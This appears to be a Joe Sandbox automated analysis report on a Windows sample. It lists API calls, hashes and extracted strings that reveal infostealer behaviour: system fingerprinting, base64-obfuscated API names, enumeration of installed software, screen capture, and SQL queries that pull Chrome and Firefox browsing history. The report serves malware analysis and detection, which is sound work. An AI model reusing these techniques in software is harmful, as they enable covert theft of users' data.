                    • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                    • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                    • Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                    • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                  • Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
                  • Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8
                    • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
                    • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
                    • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                    • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                  • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                  • API String ID: 75899496-943277980
                  • Opcode ID: 1e0d2bca87e35f6c7b5bfd10e8e1d34c57de75989c9a859d105590bcafdd4c62
                  • Instruction ID: 772785f2c09445a84a7b2349d24cb582ce7330fa6bd2b57fe2dee83489952c98
                  • Opcode Fuzzy Hash: 1e0d2bca87e35f6c7b5bfd10e8e1d34c57de75989c9a859d105590bcafdd4c62
                  • Instruction Fuzzy Hash: C8812C70A40209ABCB01FFA1DC42BCDBB79EF49309F61807BB104B6196D67DEA458B59
                  APIs
                  • GetSystemMetrics.USER32(00000000), ref: 00416AD3
                  • GetSystemMetrics.USER32(00000001), ref: 00416AEA
                    • Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                  • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F
                    • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                    • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                    • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                    • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                    • Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                    • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                  • Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
                  • Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8
                    • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
                    • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
                    • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                    • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                  • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                  • API String ID: 75899496-943277980
                  • Opcode ID: 59511fbf5850ea39f7a97e4ece4a07d480cd8920ed0554feb4cc531c0111e1d0
                  • Instruction ID: ba9566fa5802b655d19b309e0ce3e7f0f20b9e85fb6ad6d3dc3daba04cc241c3
                  • Opcode Fuzzy Hash: 59511fbf5850ea39f7a97e4ece4a07d480cd8920ed0554feb4cc531c0111e1d0
                  • Instruction Fuzzy Hash: 70811D70A40209ABCB01FFA1DC42BCDBB79EF45309F61807BB104B61D6D67DEA458B59
                  APIs
                  • GetSystemMetrics.USER32(00000000), ref: 00416AD3
                  • GetSystemMetrics.USER32(00000001), ref: 00416AEA
                    • Part of subcall function 00415E44: GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                  • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ,?,00416CA4,?,Layouts: ,?), ref: 00416B9F
                    • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                    • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                    • Part of subcall function 00416290: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                    • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                    • Part of subcall function 00416290: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                    • Part of subcall function 00416290: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                  • Sleep.KERNEL32(00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ,?,00416CA4,?,LocalTime: ), ref: 00416BC9
                  • Sleep.KERNEL32(00000001,00416CA4,[Soft],?,00000001,00416CA4,00416CA4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416BE8
                    • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
                    • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
                    • Part of subcall function 0041564C: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                    • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                  • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                  • API String ID: 75899496-943277980
                  • Opcode ID: 9adb7b97f0f0af6d8064e5965c4ea0affd5c9fa3dc3455625f80a323b340c98c
                  • Instruction ID: b8284bc9f62184e4db5d5ca1727f6710c034d5e6d015895e5eeee5dd02488032
                  • Opcode Fuzzy Hash: 9adb7b97f0f0af6d8064e5965c4ea0affd5c9fa3dc3455625f80a323b340c98c
                  • Instruction Fuzzy Hash: 2F711C70A40109ABDF01FFE1DC42BCDBB79EF48709F61803BB104B6296D67DEA458A59
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
                  • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
                  • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
                  • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
                  • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0
                    • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195AF,?), ref: 00402778
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc$FileModuleName
                  • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                  • API String ID: 2206896924-1825016774
                  • Opcode ID: 644b4f724dfd0b553440d3f209090e31220107d3092a367f2ae21a93c5497f88
                  • Instruction ID: ac0e2f41aa2f423c9d9a8d80f7c11eaba859030c7a64cc794fed102b433a0b1d
                  • Opcode Fuzzy Hash: 644b4f724dfd0b553440d3f209090e31220107d3092a367f2ae21a93c5497f88
                  • Instruction Fuzzy Hash: 2A3139B1A44208AEDB00EBE5CC42F9EBBB8AB49704F50057AF514F71D1DA78AA058B58
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EBC
                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407EC2
                  • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407ED3
                  • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407ED9
                  • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407FA6,?,-00000001), ref: 00407EEA
                  • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407EF0
                    • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,?,?,004195AF,?), ref: 00402778
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc$FileModuleName
                  • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                  • API String ID: 2206896924-1825016774
                  • Opcode ID: e9e9c055b93d3e5757fe7b5a32e11944cabe7d6e365c66e0041facfb5e6f4819
                  • Instruction ID: 15232c232ae21084946ce838b98eef105223b8b68f92314a8400df0ccc42bf71
                  • Opcode Fuzzy Hash: e9e9c055b93d3e5757fe7b5a32e11944cabe7d6e365c66e0041facfb5e6f4819
                  • Instruction Fuzzy Hash: CF313AB1A04309AEDB00EBE5CC42F9EBBECAF49704F500576F514F71D1EA78AA048B58
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                  • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc$CurrentProcess
                  • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                  • API String ID: 3877065590-4127804628
                  • Opcode ID: ca1fc72b4b2c47d8be44112ebefe3e9afb56faaddeba9d0254e414580a441eee
                  • Instruction ID: 2c13e8732db89e5f4feef8cb650b0c3b12524099063521553718e4477c38e71b
                  • Opcode Fuzzy Hash: ca1fc72b4b2c47d8be44112ebefe3e9afb56faaddeba9d0254e414580a441eee
                  • Instruction Fuzzy Hash: 779185709001199BCB10EFA9C985ADEB7B9FF84304F2181BAE509B7291D739DF858F58
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                  • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc$CurrentProcess
                  • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                  • API String ID: 3877065590-4127804628
                  • Opcode ID: 758031882bcf12ba6c5acbce1a611c45e3d0127ec21c0e511c39f9a34a672d94
                  • Instruction ID: 8191d344cd349c88f577da4185e159338671ce922f6aa283bd2b5e25c2800bc5
                  • Opcode Fuzzy Hash: 758031882bcf12ba6c5acbce1a611c45e3d0127ec21c0e511c39f9a34a672d94
                  • Instruction Fuzzy Hash: E091A5709001199BCB10EFA9C985ADEB7B9FF84304F1181BAE508B7291D739DF858F98
                  APIs
                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,), ref: 00416300
                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416306
                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE,?,00000001,), ref: 0041632E
                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416334
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165C6,?,-00000001,?,?,?,00416BAE), ref: 00416373
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416379
                  • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BAE,?,00000001,,?,?,,?,Zone: ,?,00416CA4), ref: 004164A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc$CurrentProcess
                  • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                  • API String ID: 3877065590-4127804628
                  • Opcode ID: 124315a2081c9e693a39e6801378e39db6c34271a097c37f19d89fdc8cac53d3
                  • Instruction ID: 948cc98421d4847538e10b66e82c05f92fa6bf3d8733b6e628a134da397cb227
                  • Opcode Fuzzy Hash: 124315a2081c9e693a39e6801378e39db6c34271a097c37f19d89fdc8cac53d3
                  • Instruction Fuzzy Hash: 8281A6709001199BCB10EF99C985ADEB7B9FF84304F1181BAE508B7291D739DF858F98
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
                  • RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                  • RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4
                    • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: EnumFreeOpenString
                  • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                  • API String ID: 373517563-3013244427
                  • Opcode ID: 811dec6d31122d050a97365a5b19f67a6191ec6da50f53ccff4e5404f1575c63
                  • Instruction ID: c01df635abeadf6e6837e62572b2515f3de099e5a3d6091bc8c8e2951dea1457
                  • Opcode Fuzzy Hash: 811dec6d31122d050a97365a5b19f67a6191ec6da50f53ccff4e5404f1575c63
                  • Instruction Fuzzy Hash: 94C1F5B5A001189BCB11EB55CC41BCEB7BDAB84305F5045FBB608B7282DA78AF858F5D
                  APIs
                  • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 0040269F
                  • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026A9
                  • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026C6
                  • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026D0
                  • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026F9
                  • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402703
                  • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402727
                  • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402731
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CharNext
                  • String ID: "$"
                  • API String ID: 3213498283-3758156766
                  • Opcode ID: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
                  • Instruction ID: 06a23872e8460c007548b42de0442a537cd71877075bfb16317ebbd4e879d901
                  • Opcode Fuzzy Hash: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
                  • Instruction Fuzzy Hash: 2D21E7546043D51ADB31297A0AC877A7B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
                  APIs
                  • GetDC.USER32(00000000), ref: 00417090
                  • CreateCompatibleDC.GDI32(00000000), ref: 00417099
                  • CreateCompatibleBitmap.GDI32(00000000,0041A212,?), ref: 004170A9
                  • SelectObject.GDI32(00000000,00000000), ref: 004170B2
                  • BitBlt.GDI32(00000000,00000000,00000000,0041A212,?,00000000,00000000,?,00CC0020), ref: 004170D2
                  • GlobalFix.KERNEL32(?), ref: 0041717C
                  • GlobalUnWire.KERNEL32(?), ref: 0041719E
                  • DeleteObject.GDI32(00000000), ref: 004171A4
                  • DeleteDC.GDI32(00000000), ref: 004171AA
                  • ReleaseDC.USER32(00000000,00000000), ref: 004171B2
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: CompatibleCreateDeleteGlobalObject$BitmapReleaseSelectWire
                  • String ID:
                  • API String ID: 914135935-0
                  • Opcode ID: 75d1131f51ecb2d553ab7d8928f99ad89ba4083edd43a8eb5aad49789378265a
                  • Instruction ID: ef45df128ede85129e0c4d5475d485c7d6030f40d18b36e8376d67ec69c327ad
                  • Opcode Fuzzy Hash: 75d1131f51ecb2d553ab7d8928f99ad89ba4083edd43a8eb5aad49789378265a
                  • Instruction Fuzzy Hash: BE51FDB1A44209AFDB11DF95EC85FEF7BBCAB48305F104066F604E62D1C7786984CB69
                  APIs
                  • GetTickCount.KERNEL32 ref: 004129B8
                  • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34
                  • DeleteFileW.KERNEL32(00000000), ref: 00412BD5
                  Strings
                  • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412A9E
                  • , xrefs: 00412B68
                  • %TEMP%, xrefs: 004129F3
                  • .tmp, xrefs: 004129D3
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CopyCountDeleteTick
                  • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
                  • API String ID: 2381671008-351388873
                  • Opcode ID: 3459b338a60736bb228cd6412b5c58d3a7a0a8a0136dab3eefba1ba13c187991
                  • Instruction ID: f70f4eb6c3a4d74226b28448a77a1ad81309a428455034dfd3705b2b32de383d
                  • Opcode Fuzzy Hash: 3459b338a60736bb228cd6412b5c58d3a7a0a8a0136dab3eefba1ba13c187991
                  • Instruction Fuzzy Hash: C7810B71A00109AFCB00EF95DD82EDEBBB8EF48305F504476F514F72A1DB78AA558B58
                  APIs
                  • GetTickCount.KERNEL32 ref: 00412580
                  • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC
                  • DeleteFileW.KERNEL32(00000000), ref: 0041279D
                  Strings
                  • %TEMP%, xrefs: 004125BB
                  • SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412666
                  • , xrefs: 00412730
                  • .tmp, xrefs: 0041259B
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CopyCountDeleteTick
                  • String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
                  • API String ID: 2381671008-462058183
                  • Opcode ID: 8b329c99ed99e2a4b7aa1dd1cfd571fb2f4985445734bb549b6f40b32f6b512f
                  • Instruction ID: 96711d942fa6cd82f2097d7fbc3cef73731e9345f18fca2529b5113db019f3e4
                  • Opcode Fuzzy Hash: 8b329c99ed99e2a4b7aa1dd1cfd571fb2f4985445734bb549b6f40b32f6b512f
                  • Instruction Fuzzy Hash: 70810A71A00109AFDB00EB95DD82EDEBBB8EF48305F504536F414F72A1DB78AE568B58
                  APIs
                  • GetSystemInfo.KERNEL32(0041985E,00000000,00415FD0,?,?,00000000,00000000,?,00416B89,?,,?,Zone: ,?,00416CA4,?), ref: 00415E68
                    • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeString$InfoSystem
                  • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                  • API String ID: 4070941872-1038824218
                  • Opcode ID: 0fe79e7c3c1b017fe96b948e235eeaac2ae1ea46f9167715bcbb82ec7f9ce0a5
                  • Instruction ID: 841de3dabe4d1ada80fc57b7235bfd5090272e00ed4efe0c369eb699e4c4d56e
                  • Opcode Fuzzy Hash: 0fe79e7c3c1b017fe96b948e235eeaac2ae1ea46f9167715bcbb82ec7f9ce0a5
                  • Instruction Fuzzy Hash: 3941E274A00108ABCB01EFD1D842FCDBBB9EF48305F51813BF504B7296D679EA468B59
                  APIs
